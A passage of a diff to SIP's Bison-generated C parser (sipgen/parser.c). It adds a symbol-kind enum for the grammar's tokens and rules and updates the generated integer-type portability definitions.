*/ ++ YYSYMBOL_TK_END = 33, /* TK_END */ ++ YYSYMBOL_TK_NAME_VALUE = 34, /* TK_NAME_VALUE */ ++ YYSYMBOL_TK_PATH_VALUE = 35, /* TK_PATH_VALUE */ ++ YYSYMBOL_TK_STRING_VALUE = 36, /* TK_STRING_VALUE */ ++ YYSYMBOL_TK_VIRTUALCATCHERCODE = 37, /* TK_VIRTUALCATCHERCODE */ ++ YYSYMBOL_TK_TRAVERSECODE = 38, /* TK_TRAVERSECODE */ ++ YYSYMBOL_TK_CLEARCODE = 39, /* TK_CLEARCODE */ ++ YYSYMBOL_TK_GETBUFFERCODE = 40, /* TK_GETBUFFERCODE */ ++ YYSYMBOL_TK_RELEASEBUFFERCODE = 41, /* TK_RELEASEBUFFERCODE */ ++ YYSYMBOL_TK_READBUFFERCODE = 42, /* TK_READBUFFERCODE */ ++ YYSYMBOL_TK_WRITEBUFFERCODE = 43, /* TK_WRITEBUFFERCODE */ ++ YYSYMBOL_TK_SEGCOUNTCODE = 44, /* TK_SEGCOUNTCODE */ ++ YYSYMBOL_TK_CHARBUFFERCODE = 45, /* TK_CHARBUFFERCODE */ ++ YYSYMBOL_TK_PICKLECODE = 46, /* TK_PICKLECODE */ ++ YYSYMBOL_TK_VIRTUALCALLCODE = 47, /* TK_VIRTUALCALLCODE */ ++ YYSYMBOL_TK_METHODCODE = 48, /* TK_METHODCODE */ ++ YYSYMBOL_TK_PREMETHODCODE = 49, /* TK_PREMETHODCODE */ ++ YYSYMBOL_TK_INSTANCECODE = 50, /* TK_INSTANCECODE */ ++ YYSYMBOL_TK_FROMTYPE = 51, /* TK_FROMTYPE */ ++ YYSYMBOL_TK_TOTYPE = 52, /* TK_TOTYPE */ ++ YYSYMBOL_TK_TOSUBCLASS = 53, /* TK_TOSUBCLASS */ ++ YYSYMBOL_TK_INCLUDE = 54, /* TK_INCLUDE */ ++ YYSYMBOL_TK_OPTINCLUDE = 55, /* TK_OPTINCLUDE */ ++ YYSYMBOL_TK_IMPORT = 56, /* TK_IMPORT */ ++ YYSYMBOL_TK_EXPHEADERCODE = 57, /* TK_EXPHEADERCODE */ ++ YYSYMBOL_TK_MODHEADERCODE = 58, /* TK_MODHEADERCODE */ ++ YYSYMBOL_TK_TYPEHEADERCODE = 59, /* TK_TYPEHEADERCODE */ ++ YYSYMBOL_TK_MODULE = 60, /* TK_MODULE */ ++ YYSYMBOL_TK_CMODULE = 61, /* TK_CMODULE */ ++ YYSYMBOL_TK_CONSMODULE = 62, /* TK_CONSMODULE */ ++ YYSYMBOL_TK_COMPOMODULE = 63, /* TK_COMPOMODULE */ ++ YYSYMBOL_TK_CLASS = 64, /* TK_CLASS */ ++ YYSYMBOL_TK_STRUCT = 65, /* TK_STRUCT */ ++ YYSYMBOL_TK_PUBLIC = 66, /* TK_PUBLIC */ ++ YYSYMBOL_TK_PROTECTED = 67, /* TK_PROTECTED */ ++ YYSYMBOL_TK_PRIVATE = 68, /* TK_PRIVATE */ ++ YYSYMBOL_TK_SIGNALS = 69, /* TK_SIGNALS */ ++ YYSYMBOL_TK_SIGNAL_METHOD = 70, /* TK_SIGNAL_METHOD */ ++ YYSYMBOL_TK_SLOTS = 71, /* TK_SLOTS */ ++ YYSYMBOL_TK_SLOT_METHOD = 72, /* TK_SLOT_METHOD */ ++ YYSYMBOL_TK_BOOL = 73, /* TK_BOOL */ ++ YYSYMBOL_TK_SHORT = 74, /* TK_SHORT */ ++ YYSYMBOL_TK_INT = 75, /* TK_INT */ ++ YYSYMBOL_TK_LONG = 76, /* TK_LONG */ ++ YYSYMBOL_TK_FLOAT = 77, /* TK_FLOAT */ ++ YYSYMBOL_TK_DOUBLE = 78, /* TK_DOUBLE */ ++ YYSYMBOL_TK_CHAR = 79, /* TK_CHAR */ ++ YYSYMBOL_TK_WCHAR_T = 80, /* TK_WCHAR_T */ ++ YYSYMBOL_TK_VOID = 81, /* TK_VOID */ ++ YYSYMBOL_TK_PYOBJECT = 82, /* TK_PYOBJECT */ ++ YYSYMBOL_TK_PYTUPLE = 83, /* TK_PYTUPLE */ ++ YYSYMBOL_TK_PYLIST = 84, /* TK_PYLIST */ ++ YYSYMBOL_TK_PYDICT = 85, /* TK_PYDICT */ ++ YYSYMBOL_TK_PYCALLABLE = 86, /* TK_PYCALLABLE */ ++ YYSYMBOL_TK_PYSLICE = 87, /* TK_PYSLICE */ ++ YYSYMBOL_TK_PYTYPE = 88, /* TK_PYTYPE */ ++ YYSYMBOL_TK_PYBUFFER = 89, /* TK_PYBUFFER */ ++ YYSYMBOL_TK_VIRTUAL = 90, /* TK_VIRTUAL */ ++ YYSYMBOL_TK_ENUM = 91, /* TK_ENUM */ ++ YYSYMBOL_TK_SIGNED = 92, /* TK_SIGNED */ ++ YYSYMBOL_TK_UNSIGNED = 93, /* TK_UNSIGNED */ ++ YYSYMBOL_TK_SCOPE = 94, /* TK_SCOPE */ ++ YYSYMBOL_TK_LOGICAL_OR = 95, /* TK_LOGICAL_OR */ ++ YYSYMBOL_TK_CONST = 96, /* TK_CONST */ ++ YYSYMBOL_TK_STATIC = 97, /* TK_STATIC */ ++ YYSYMBOL_TK_SIPSIGNAL = 98, /* TK_SIPSIGNAL */ ++ YYSYMBOL_TK_SIPSLOT = 99, /* TK_SIPSLOT */ ++ YYSYMBOL_TK_SIPANYSLOT = 100, /* TK_SIPANYSLOT */ ++ YYSYMBOL_TK_SIPRXCON = 101, /* TK_SIPRXCON */ ++ YYSYMBOL_TK_SIPRXDIS = 102, /* TK_SIPRXDIS */ ++ YYSYMBOL_TK_SIPSLOTCON = 103, /* TK_SIPSLOTCON */ ++ YYSYMBOL_TK_SIPSLOTDIS = 104, /* TK_SIPSLOTDIS */ ++ YYSYMBOL_TK_SIPSSIZET = 105, /* TK_SIPSSIZET */ ++ YYSYMBOL_TK_SIZET = 106, /* TK_SIZET */ ++ YYSYMBOL_TK_NUMBER_VALUE = 107, /* TK_NUMBER_VALUE */ ++ YYSYMBOL_TK_REAL_VALUE = 108, /* TK_REAL_VALUE */ ++ YYSYMBOL_TK_TYPEDEF = 109, /* TK_TYPEDEF */ ++ YYSYMBOL_TK_NAMESPACE = 110, /* TK_NAMESPACE */ ++ YYSYMBOL_TK_TIMELINE = 111, /* TK_TIMELINE */ ++ YYSYMBOL_TK_PLATFORMS = 112, /* TK_PLATFORMS */ ++ YYSYMBOL_TK_FEATURE = 113, /* TK_FEATURE */ ++ YYSYMBOL_TK_LICENSE = 114, /* TK_LICENSE */ ++ YYSYMBOL_TK_QCHAR_VALUE = 115, /* TK_QCHAR_VALUE */ ++ YYSYMBOL_TK_TRUE_VALUE = 116, /* TK_TRUE_VALUE */ ++ YYSYMBOL_TK_FALSE_VALUE = 117, /* TK_FALSE_VALUE */ ++ YYSYMBOL_TK_NULL_VALUE = 118, /* TK_NULL_VALUE */ ++ YYSYMBOL_TK_OPERATOR = 119, /* TK_OPERATOR */ ++ YYSYMBOL_TK_THROW = 120, /* TK_THROW */ ++ YYSYMBOL_TK_QOBJECT = 121, /* TK_QOBJECT */ ++ YYSYMBOL_TK_EXCEPTION = 122, /* TK_EXCEPTION */ ++ YYSYMBOL_TK_RAISECODE = 123, /* TK_RAISECODE */ ++ YYSYMBOL_TK_EXPLICIT = 124, /* TK_EXPLICIT */ ++ YYSYMBOL_TK_TEMPLATE = 125, /* TK_TEMPLATE */ ++ YYSYMBOL_TK_FINAL = 126, /* TK_FINAL */ ++ YYSYMBOL_TK_ELLIPSIS = 127, /* TK_ELLIPSIS */ ++ YYSYMBOL_TK_DEFMETATYPE = 128, /* TK_DEFMETATYPE */ ++ YYSYMBOL_TK_DEFSUPERTYPE = 129, /* TK_DEFSUPERTYPE */ ++ YYSYMBOL_TK_PROPERTY = 130, /* TK_PROPERTY */ ++ YYSYMBOL_TK_HIDE_NS = 131, /* TK_HIDE_NS */ ++ YYSYMBOL_TK_FORMAT = 132, /* TK_FORMAT */ ++ YYSYMBOL_TK_GET = 133, /* TK_GET */ ++ YYSYMBOL_TK_ID = 134, /* TK_ID */ ++ YYSYMBOL_TK_KWARGS = 135, /* TK_KWARGS */ ++ YYSYMBOL_TK_LANGUAGE = 136, /* TK_LANGUAGE */ ++ YYSYMBOL_TK_LICENSEE = 137, /* TK_LICENSEE */ ++ YYSYMBOL_TK_NAME = 138, /* TK_NAME */ ++ YYSYMBOL_TK_OPTIONAL = 139, /* TK_OPTIONAL */ ++ YYSYMBOL_TK_ORDER = 140, /* TK_ORDER */ ++ YYSYMBOL_TK_REMOVELEADING = 141, /* TK_REMOVELEADING */ ++ YYSYMBOL_TK_SET = 142, /* TK_SET */ ++ YYSYMBOL_TK_SIGNATURE = 143, /* TK_SIGNATURE */ ++ YYSYMBOL_TK_TIMESTAMP = 144, /* TK_TIMESTAMP */ ++ YYSYMBOL_TK_TYPE = 145, /* TK_TYPE */ ++ YYSYMBOL_TK_USEARGNAMES = 146, /* TK_USEARGNAMES */ ++ YYSYMBOL_TK_PYSSIZETCLEAN = 147, /* TK_PYSSIZETCLEAN */ ++ YYSYMBOL_TK_USELIMITEDAPI = 148, /* TK_USELIMITEDAPI */ ++ YYSYMBOL_TK_ALLRAISEPYEXC = 149, /* TK_ALLRAISEPYEXC */ ++ YYSYMBOL_TK_CALLSUPERINIT = 150, /* TK_CALLSUPERINIT */ ++ YYSYMBOL_TK_DEFERRORHANDLER = 151, /* TK_DEFERRORHANDLER */ ++ YYSYMBOL_TK_VERSION = 152, /* TK_VERSION */ ++ YYSYMBOL_153_ = 153, /* '(' */ ++ YYSYMBOL_154_ = 154, /* ')' */ ++ YYSYMBOL_155_ = 155, /* ',' */ ++ YYSYMBOL_156_ = 156, /* '=' */ ++ YYSYMBOL_157_ = 157, /* '{' */ ++ YYSYMBOL_158_ = 158, /* '}' */ ++ YYSYMBOL_159_ = 159, /* ';' */ ++ YYSYMBOL_160_ = 160, /* '!' */ ++ YYSYMBOL_161_ = 161, /* '-' */ ++ YYSYMBOL_162_ = 162, /* '+' */ ++ YYSYMBOL_163_ = 163, /* '*' */ ++ YYSYMBOL_164_ = 164, /* '/' */ ++ YYSYMBOL_165_ = 165, /* '&' */ ++ YYSYMBOL_166_ = 166, /* '|' */ ++ YYSYMBOL_167_ = 167, /* '~' */ ++ YYSYMBOL_168_ = 168, /* '<' */ ++ YYSYMBOL_169_ = 169, /* '>' */ ++ YYSYMBOL_170_ = 170, /* ':' */ ++ YYSYMBOL_171_ = 171, /* '[' */ ++ YYSYMBOL_172_ = 172, /* ']' */ ++ YYSYMBOL_173_ = 173, /* '%' */ ++ YYSYMBOL_174_ = 174, /* '^' */ ++ YYSYMBOL_YYACCEPT = 175, /* $accept */ ++ YYSYMBOL_specification = 176, /* specification */ ++ YYSYMBOL_statement = 177, /* statement */ ++ YYSYMBOL_178_1 = 178, /* $@1 */ ++ YYSYMBOL_modstatement = 179, /* modstatement */ ++ YYSYMBOL_nsstatement = 180, /* nsstatement */ ++ YYSYMBOL_defdocstringfmt = 181, /* defdocstringfmt */ ++ YYSYMBOL_defdocstringfmt_args = 182, /* defdocstringfmt_args */ ++ YYSYMBOL_defdocstringfmt_arg_list = 183, /* defdocstringfmt_arg_list */ ++ YYSYMBOL_defdocstringfmt_arg = 184, /* defdocstringfmt_arg */ ++ YYSYMBOL_defdocstringsig = 185, /* defdocstringsig */ ++ YYSYMBOL_defdocstringsig_args = 186, /* defdocstringsig_args */ ++ YYSYMBOL_defdocstringsig_arg_list = 187, /* defdocstringsig_arg_list */ ++ YYSYMBOL_defdocstringsig_arg = 188, /* defdocstringsig_arg */ ++ YYSYMBOL_defencoding = 189, /* defencoding */ ++ YYSYMBOL_defencoding_args = 190, /* defencoding_args */ ++ YYSYMBOL_defencoding_arg_list = 191, /* defencoding_arg_list */ ++ YYSYMBOL_defencoding_arg = 192, /* defencoding_arg */ ++ YYSYMBOL_plugin = 193, /* plugin */ ++ YYSYMBOL_plugin_args = 194, /* plugin_args */ ++ YYSYMBOL_plugin_arg_list = 195, /* plugin_arg_list */ ++ YYSYMBOL_plugin_arg = 196, /* plugin_arg */ ++ YYSYMBOL_virterrorhandler = 197, /* virterrorhandler */ ++ YYSYMBOL_veh_args = 198, /* veh_args */ ++ YYSYMBOL_veh_arg_list = 199, /* veh_arg_list */ ++ YYSYMBOL_veh_arg = 200, /* veh_arg */ ++ YYSYMBOL_api = 201, /* api */ ++ YYSYMBOL_api_args = 202, /* api_args */ ++ YYSYMBOL_api_arg_list = 203, /* api_arg_list */ ++ YYSYMBOL_api_arg = 204, /* api_arg */ ++ YYSYMBOL_exception = 205, /* exception */ ++ YYSYMBOL_baseexception = 206, /* baseexception */ ++ YYSYMBOL_exception_body = 207, /* exception_body */ ++ YYSYMBOL_exception_body_directives = 208, /* exception_body_directives */ ++ YYSYMBOL_exception_body_directive = 209, /* exception_body_directive */ ++ YYSYMBOL_raisecode = 210, /* raisecode */ ++ YYSYMBOL_mappedtype = 211, /* mappedtype */ ++ YYSYMBOL_212_2 = 212, /* $@2 */ ++ YYSYMBOL_mappedtypetmpl = 213, /* mappedtypetmpl */ ++ YYSYMBOL_214_3 = 214, /* $@3 */ ++ YYSYMBOL_mtdefinition = 215, /* mtdefinition */ ++ YYSYMBOL_mtbody = 216, /* mtbody */ ++ YYSYMBOL_mtline = 217, /* mtline */ ++ YYSYMBOL_mtfunction = 218, /* mtfunction */ ++ YYSYMBOL_namespace = 219, /* namespace */ ++ YYSYMBOL_220_4 = 220, /* $@4 */ ++ YYSYMBOL_optnsbody = 221, /* optnsbody */ ++ YYSYMBOL_nsbody = 222, /* nsbody */ ++ YYSYMBOL_platforms = 223, /* platforms */ ++ YYSYMBOL_224_5 = 224, /* $@5 */ ++ YYSYMBOL_platformlist = 225, /* platformlist */ ++ YYSYMBOL_platform = 226, /* platform */ ++ YYSYMBOL_feature = 227, /* feature */ ++ YYSYMBOL_feature_args = 228, /* feature_args */ ++ YYSYMBOL_feature_arg_list = 229, /* feature_arg_list */ ++ YYSYMBOL_feature_arg = 230, /* feature_arg */ ++ YYSYMBOL_timeline = 231, /* timeline */ ++ YYSYMBOL_232_6 = 232, /* $@6 */ ++ YYSYMBOL_qualifierlist = 233, /* qualifierlist */ ++ YYSYMBOL_qualifiername = 234, /* qualifiername */ ++ YYSYMBOL_ifstart = 235, /* ifstart */ ++ YYSYMBOL_236_7 = 236, /* $@7 */ ++ YYSYMBOL_oredqualifiers = 237, /* oredqualifiers */ ++ YYSYMBOL_qualifiers = 238, /* qualifiers */ ++ YYSYMBOL_ifend = 239, /* ifend */ ++ YYSYMBOL_license = 240, /* license */ ++ YYSYMBOL_license_args = 241, /* license_args */ ++ YYSYMBOL_license_arg_list = 242, /* license_arg_list */ ++ YYSYMBOL_license_arg = 243, /* license_arg */ ++ YYSYMBOL_defmetatype = 244, /* defmetatype */ ++ YYSYMBOL_defmetatype_args = 245, /* defmetatype_args */ ++ YYSYMBOL_defmetatype_arg_list = 246, /* defmetatype_arg_list */ ++ YYSYMBOL_defmetatype_arg = 247, /* defmetatype_arg */ ++ YYSYMBOL_defsupertype = 248, /* defsupertype */ ++ YYSYMBOL_defsupertype_args = 249, /* defsupertype_args */ ++ YYSYMBOL_defsupertype_arg_list = 250, /* defsupertype_arg_list */ ++ YYSYMBOL_defsupertype_arg = 251, /* defsupertype_arg */ ++ YYSYMBOL_hiddenns = 252, /* hiddenns */ ++ YYSYMBOL_hiddenns_args = 253, /* hiddenns_args */ ++ YYSYMBOL_hiddenns_arg_list = 254, /* hiddenns_arg_list */ ++ YYSYMBOL_hiddenns_arg = 255, /* hiddenns_arg */ ++ YYSYMBOL_consmodule = 256, /* consmodule */ ++ YYSYMBOL_consmodule_args = 257, /* consmodule_args */ ++ YYSYMBOL_consmodule_arg_list = 258, /* consmodule_arg_list */ ++ YYSYMBOL_consmodule_arg = 259, /* consmodule_arg */ ++ YYSYMBOL_consmodule_body = 260, /* consmodule_body */ ++ YYSYMBOL_consmodule_body_directives = 261, /* consmodule_body_directives */ ++ YYSYMBOL_consmodule_body_directive = 262, /* consmodule_body_directive */ ++ YYSYMBOL_compmodule = 263, /* compmodule */ ++ YYSYMBOL_compmodule_args = 264, /* compmodule_args */ ++ YYSYMBOL_compmodule_arg_list = 265, /* compmodule_arg_list */ ++ YYSYMBOL_compmodule_arg = 266, /* compmodule_arg */ ++ YYSYMBOL_compmodule_body = 267, /* compmodule_body */ ++ YYSYMBOL_compmodule_body_directives = 268, /* compmodule_body_directives */ ++ YYSYMBOL_compmodule_body_directive = 269, /* compmodule_body_directive */ ++ YYSYMBOL_module = 270, /* module */ ++ YYSYMBOL_module_args = 271, /* module_args */ ++ YYSYMBOL_272_8 = 272, /* $@8 */ ++ YYSYMBOL_module_arg_list = 273, /* module_arg_list */ ++ YYSYMBOL_module_arg = 274, /* module_arg */ ++ YYSYMBOL_module_body = 275, /* module_body */ ++ YYSYMBOL_module_body_directives = 276, /* module_body_directives */ ++ YYSYMBOL_module_body_directive = 277, /* module_body_directive */ ++ YYSYMBOL_dottedname = 278, /* dottedname */ ++ YYSYMBOL_optnumber = 279, /* optnumber */ ++ YYSYMBOL_include = 280, /* include */ ++ YYSYMBOL_include_args = 281, /* include_args */ ++ YYSYMBOL_include_arg_list = 282, /* include_arg_list */ ++ YYSYMBOL_include_arg = 283, /* include_arg */ ++ YYSYMBOL_optinclude = 284, /* optinclude */ ++ YYSYMBOL_import = 285, /* import */ ++ YYSYMBOL_import_args = 286, /* import_args */ ++ YYSYMBOL_import_arg_list = 287, /* import_arg_list */ ++ YYSYMBOL_import_arg = 288, /* import_arg */ ++ YYSYMBOL_optaccesscode = 289, /* optaccesscode */ ++ YYSYMBOL_optgetcode = 290, /* optgetcode */ ++ YYSYMBOL_optsetcode = 291, /* optsetcode */ ++ YYSYMBOL_copying = 292, /* copying */ ++ YYSYMBOL_exphdrcode = 293, /* exphdrcode */ ++ YYSYMBOL_modhdrcode = 294, /* modhdrcode */ ++ YYSYMBOL_typehdrcode = 295, /* typehdrcode */ ++ YYSYMBOL_travcode = 296, /* travcode */ ++ YYSYMBOL_clearcode = 297, /* clearcode */ ++ YYSYMBOL_getbufcode = 298, /* getbufcode */ ++ YYSYMBOL_releasebufcode = 299, /* releasebufcode */ ++ YYSYMBOL_readbufcode = 300, /* readbufcode */ ++ YYSYMBOL_writebufcode = 301, /* writebufcode */ ++ YYSYMBOL_segcountcode = 302, /* segcountcode */ ++ YYSYMBOL_charbufcode = 303, /* charbufcode */ ++ YYSYMBOL_instancecode = 304, /* instancecode */ ++ YYSYMBOL_picklecode = 305, /* picklecode */ ++ YYSYMBOL_finalcode = 306, /* finalcode */ ++ YYSYMBOL_modcode = 307, /* modcode */ ++ YYSYMBOL_typecode = 308, /* typecode */ ++ YYSYMBOL_preinitcode = 309, /* preinitcode */ ++ YYSYMBOL_initcode = 310, /* initcode */ ++ YYSYMBOL_postinitcode = 311, /* postinitcode */ ++ YYSYMBOL_unitcode = 312, /* unitcode */ ++ YYSYMBOL_unitpostinccode = 313, /* unitpostinccode */ ++ YYSYMBOL_prepycode = 314, /* prepycode */ ++ YYSYMBOL_exptypehintcode = 315, /* exptypehintcode */ ++ YYSYMBOL_modtypehintcode = 316, /* modtypehintcode */ ++ YYSYMBOL_classtypehintcode = 317, /* classtypehintcode */ ++ YYSYMBOL_doc = 318, /* doc */ ++ YYSYMBOL_exporteddoc = 319, /* exporteddoc */ ++ YYSYMBOL_autopyname = 320, /* autopyname */ ++ YYSYMBOL_autopyname_args = 321, /* autopyname_args */ ++ YYSYMBOL_autopyname_arg_list = 322, /* autopyname_arg_list */ ++ YYSYMBOL_autopyname_arg = 323, /* autopyname_arg */ ++ YYSYMBOL_docstring = 324, /* docstring */ ++ YYSYMBOL_docstring_args = 325, /* docstring_args */ ++ YYSYMBOL_docstring_arg_list = 326, /* docstring_arg_list */ ++ YYSYMBOL_docstring_arg = 327, /* docstring_arg */ ++ YYSYMBOL_optdocstring = 328, /* optdocstring */ ++ YYSYMBOL_extract = 329, /* extract */ ++ YYSYMBOL_extract_args = 330, /* extract_args */ ++ YYSYMBOL_extract_arg_list = 331, /* extract_arg_list */ ++ YYSYMBOL_extract_arg = 332, /* extract_arg */ ++ YYSYMBOL_makefile = 333, /* makefile */ ++ YYSYMBOL_codeblock = 334, /* codeblock */ ++ YYSYMBOL_codelines = 335, /* codelines */ ++ YYSYMBOL_enum = 336, /* enum */ ++ YYSYMBOL_337_9 = 337, /* $@9 */ ++ YYSYMBOL_optenumkey = 338, /* optenumkey */ ++ YYSYMBOL_optfilename = 339, /* optfilename */ ++ YYSYMBOL_optname = 340, /* optname */ ++ YYSYMBOL_optenumbody = 341, /* optenumbody */ ++ YYSYMBOL_enumbody = 342, /* enumbody */ ++ YYSYMBOL_enumline = 343, /* enumline */ ++ YYSYMBOL_optcomma = 344, /* optcomma */ ++ YYSYMBOL_optenumassign = 345, /* optenumassign */ ++ YYSYMBOL_optassign = 346, /* optassign */ ++ YYSYMBOL_expr = 347, /* expr */ ++ YYSYMBOL_binop = 348, /* binop */ ++ YYSYMBOL_optunop = 349, /* optunop */ ++ YYSYMBOL_value = 350, /* value */ ++ YYSYMBOL_optcast = 351, /* optcast */ ++ YYSYMBOL_scopedname = 352, /* scopedname */ ++ YYSYMBOL_scopednamehead = 353, /* scopednamehead */ ++ YYSYMBOL_scopepart = 354, /* scopepart */ ++ YYSYMBOL_bool_value = 355, /* bool_value */ ++ YYSYMBOL_simplevalue = 356, /* simplevalue */ ++ YYSYMBOL_exprlist = 357, /* exprlist */ ++ YYSYMBOL_typedef = 358, /* typedef */ ++ YYSYMBOL_struct = 359, /* struct */ ++ YYSYMBOL_360_10 = 360, /* $@10 */ ++ YYSYMBOL_361_11 = 361, /* $@11 */ ++ YYSYMBOL_classtmpl = 362, /* classtmpl */ ++ YYSYMBOL_363_12 = 363, /* $@12 */ ++ YYSYMBOL_template = 364, /* template */ ++ YYSYMBOL_class = 365, /* class */ ++ YYSYMBOL_366_13 = 366, /* $@13 */ ++ YYSYMBOL_367_14 = 367, /* $@14 */ ++ YYSYMBOL_superclasses = 368, /* superclasses */ ++ YYSYMBOL_superlist = 369, /* superlist */ ++ YYSYMBOL_superclass = 370, /* superclass */ ++ YYSYMBOL_class_access = 371, /* class_access */ ++ YYSYMBOL_optclassbody = 372, /* optclassbody */ ++ YYSYMBOL_classbody = 373, /* classbody */ ++ YYSYMBOL_classline = 374, /* classline */ ++ YYSYMBOL_property = 375, /* property */ ++ YYSYMBOL_property_args = 376, /* property_args */ ++ YYSYMBOL_property_arg_list = 377, /* property_arg_list */ ++ YYSYMBOL_property_arg = 378, /* property_arg */ ++ YYSYMBOL_property_body = 379, /* property_body */ ++ YYSYMBOL_property_body_directives = 380, /* property_body_directives */ ++ YYSYMBOL_property_body_directive = 381, /* property_body_directive */ ++ YYSYMBOL_name_or_string = 382, /* name_or_string */ ++ YYSYMBOL_optslot = 383, /* optslot */ ++ YYSYMBOL_dtor = 384, /* dtor */ ++ YYSYMBOL_385_15 = 385, /* $@15 */ ++ YYSYMBOL_dtor_decl = 386, /* dtor_decl */ ++ YYSYMBOL_ctor = 387, /* ctor */ ++ YYSYMBOL_388_16 = 388, /* $@16 */ ++ YYSYMBOL_simplector = 389, /* simplector */ ++ YYSYMBOL_optctorsig = 390, /* optctorsig */ ++ YYSYMBOL_391_17 = 391, /* $@17 */ ++ YYSYMBOL_optsig = 392, /* optsig */ ++ YYSYMBOL_393_18 = 393, /* $@18 */ ++ YYSYMBOL_function = 394, /* function */ ++ YYSYMBOL_operatorname = 395, /* operatorname */ ++ YYSYMBOL_optconst = 396, /* optconst */ ++ YYSYMBOL_optfinal = 397, /* optfinal */ ++ YYSYMBOL_optabstract = 398, /* optabstract */ ++ YYSYMBOL_optflags = 399, /* optflags */ ++ YYSYMBOL_flaglist = 400, /* flaglist */ ++ YYSYMBOL_flag = 401, /* flag */ ++ YYSYMBOL_flagvalue = 402, /* flagvalue */ ++ YYSYMBOL_virtualcallcode = 403, /* virtualcallcode */ ++ YYSYMBOL_methodcode = 404, /* methodcode */ ++ YYSYMBOL_premethodcode = 405, /* premethodcode */ ++ YYSYMBOL_virtualcatchercode = 406, /* virtualcatchercode */ ++ YYSYMBOL_arglist = 407, /* arglist */ ++ YYSYMBOL_rawarglist = 408, /* rawarglist */ ++ YYSYMBOL_argvalue = 409, /* argvalue */ ++ YYSYMBOL_varmember = 410, /* varmember */ ++ YYSYMBOL_411_19 = 411, /* $@19 */ ++ YYSYMBOL_412_20 = 412, /* $@20 */ ++ YYSYMBOL_simple_varmem = 413, /* simple_varmem */ ++ YYSYMBOL_414_21 = 414, /* $@21 */ ++ YYSYMBOL_varmem = 415, /* varmem */ ++ YYSYMBOL_member = 416, /* member */ ++ YYSYMBOL_417_22 = 417, /* $@22 */ ++ YYSYMBOL_variable = 418, /* variable */ ++ YYSYMBOL_variable_body = 419, /* variable_body */ ++ YYSYMBOL_variable_body_directives = 420, /* variable_body_directives */ ++ YYSYMBOL_variable_body_directive = 421, /* variable_body_directive */ ++ YYSYMBOL_cpptype = 422, /* cpptype */ ++ YYSYMBOL_argtype = 423, /* argtype */ ++ YYSYMBOL_optref = 424, /* optref */ ++ YYSYMBOL_deref = 425, /* deref */ ++ YYSYMBOL_basetype = 426, /* basetype */ ++ YYSYMBOL_cpptypelist = 427, /* cpptypelist */ ++ YYSYMBOL_optexceptions = 428, /* optexceptions */ ++ YYSYMBOL_exceptionlist = 429 /* exceptionlist */ ++}; ++typedef enum yysymbol_kind_t yysymbol_kind_t; + +-/* Copy the second part of user declarations. */ + + +-/* Line 216 of yacc.c. */ +-#line 639 "sip-4.19.23/sipgen/parser.c" + + #ifdef short + # undef short + #endif + +-#ifdef YYTYPE_UINT8 +-typedef YYTYPE_UINT8 yytype_uint8; +-#else +-typedef unsigned char yytype_uint8; ++/* On compilers that do not define __PTRDIFF_MAX__ etc., make sure ++ <limits.h> and (if available) <stdint.h> are included ++ so that the code can choose integer types of a good width. */ ++ ++#ifndef __PTRDIFF_MAX__ ++# include <limits.h> /* INFRINGES ON USER NAME SPACE */ ++# if defined __STDC_VERSION__ && 199901 <= __STDC_VERSION__ ++# include <stdint.h> /* INFRINGES ON USER NAME SPACE */ ++# define YY_STDINT_H ++# endif + #endif + +-#ifdef YYTYPE_INT8 +-typedef YYTYPE_INT8 yytype_int8; +-#elif (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++/* Narrow types that promote to a signed type and that can represent a ++ signed or unsigned integer of at least N bits. In tables they can ++ save space and decrease cache pressure. Promoting to a signed type ++ helps avoid bugs in integer arithmetic. */ ++ ++#ifdef __INT_LEAST8_MAX__ ++typedef __INT_LEAST8_TYPE__ yytype_int8; ++#elif defined YY_STDINT_H ++typedef int_least8_t yytype_int8; ++#else + typedef signed char yytype_int8; ++#endif ++ ++#ifdef __INT_LEAST16_MAX__ ++typedef __INT_LEAST16_TYPE__ yytype_int16; ++#elif defined YY_STDINT_H ++typedef int_least16_t yytype_int16; + #else +-typedef short int yytype_int8; ++typedef short yytype_int16; ++#endif ++ ++/* Work around bug in HP-UX 11.23, which defines these macros ++ incorrectly for preprocessor constants. This workaround can likely ++ be removed in 2023, as HPE has promised support for HP-UX 11.23 ++ (aka HP-UX 11i v2) only through the end of 2022; see Table 2 of ++ <https://h20195.www2.hpe.com/V2/getpdf.aspx/4AA4-7673ENW.pdf>. */ ++#ifdef __hpux ++# undef UINT_LEAST8_MAX ++# undef UINT_LEAST16_MAX ++# define UINT_LEAST8_MAX 255 ++# define UINT_LEAST16_MAX 65535 + #endif + +-#ifdef YYTYPE_UINT16 +-typedef YYTYPE_UINT16 yytype_uint16; ++#if defined __UINT_LEAST8_MAX__ && __UINT_LEAST8_MAX__ <= __INT_MAX__ ++typedef __UINT_LEAST8_TYPE__ yytype_uint8; ++#elif (!defined __UINT_LEAST8_MAX__ && defined YY_STDINT_H \ ++ && UINT_LEAST8_MAX <= INT_MAX) ++typedef uint_least8_t yytype_uint8; ++#elif !defined __UINT_LEAST8_MAX__ && UCHAR_MAX <= INT_MAX ++typedef unsigned char yytype_uint8; + #else +-typedef unsigned short int yytype_uint16; ++typedef short yytype_uint8; + #endif + +-#ifdef YYTYPE_INT16 +-typedef YYTYPE_INT16 yytype_int16; ++#if defined __UINT_LEAST16_MAX__ && __UINT_LEAST16_MAX__ <= __INT_MAX__ ++typedef __UINT_LEAST16_TYPE__ yytype_uint16; ++#elif (!defined __UINT_LEAST16_MAX__ && defined YY_STDINT_H \ ++ && UINT_LEAST16_MAX <= INT_MAX) ++typedef uint_least16_t yytype_uint16; ++#elif !defined __UINT_LEAST16_MAX__ && USHRT_MAX <= INT_MAX ++typedef unsigned short yytype_uint16; + #else +-typedef short int yytype_int16; ++typedef int yytype_uint16; ++#endif ++ ++#ifndef YYPTRDIFF_T ++# if defined __PTRDIFF_TYPE__ && defined __PTRDIFF_MAX__ ++# define YYPTRDIFF_T __PTRDIFF_TYPE__ ++# define YYPTRDIFF_MAXIMUM __PTRDIFF_MAX__ ++# elif defined PTRDIFF_MAX ++# ifndef ptrdiff_t ++# include <stddef.h> /* INFRINGES ON USER NAME SPACE */ ++# endif ++# define YYPTRDIFF_T ptrdiff_t ++# define YYPTRDIFF_MAXIMUM PTRDIFF_MAX ++# else ++# define YYPTRDIFF_T long ++# define YYPTRDIFF_MAXIMUM LONG_MAX ++# endif + #endif + + #ifndef YYSIZE_T +@@ -673,55 +806,106 @@ typedef short int yytype_int16; + # define YYSIZE_T __SIZE_TYPE__ + # elif defined size_t + # define YYSIZE_T size_t +-# elif ! defined YYSIZE_T && (defined __STDC__ || defined 